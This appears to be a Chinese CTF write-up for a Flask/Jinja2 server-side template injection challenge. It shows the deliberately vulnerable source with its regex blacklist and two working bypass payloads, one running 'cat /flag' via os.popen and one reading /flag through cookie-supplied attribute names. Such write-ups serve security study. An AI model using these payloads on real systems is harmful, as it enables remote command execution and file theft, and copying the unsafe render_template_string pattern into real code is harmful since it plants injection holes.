Werkzeug/1.0.1Python/3.8.7
    源码EXP

    1. /?name={%print(lipsum|attr(request.values.a)|attr(request.values.b)(request.values.c)|attr(request.values.d)(request.values.tari)|attr(request.values.f)())%}&tari=cat%20/flag&a=__globals__&b=__getitem__&c=os&d=popen&f=read

    image.png

    源码

    1. from flask import Flask
    2. from flask import request
    3. from flask import render_template_string
    4. import re
    6. app = Flask(__name__)
    7. @app.route('/')
    8. def app_index():
    9.     name = request.args.get('name')
    10.     if name:
    11.         if re.search(r"\'|\"|args|\[|\_|os|\{\{",name,re.I):
    12.             return ':('
    13.     template = '''
    14. {%% block body %%}
    15.     <div class="center-content error">
    16.         <h1>Hello</h1>
    17.         <h3>%s</h3>
    18.     </div> 
    19. {%% endblock %%}
    20. ''' % (request.args.get('name'))
    21.     return render_template_string(template)
    23. if __name__=="__main__":
    24.     app.run(host='0.0.0.0',port=80)

    在上题基础上过滤了 {{ 可以换成其他定界符,如 {% %}这个是语句,不过其不像 {{}} 会打印结果,因此要使用 print 输出。

    其他解法,Cookie传参

    1. /?name={%set%20aaa=(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4)%}{%print(aaa.open(request.cookies.x5).read())%}
    1. Cookie:x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=/flag

    image.png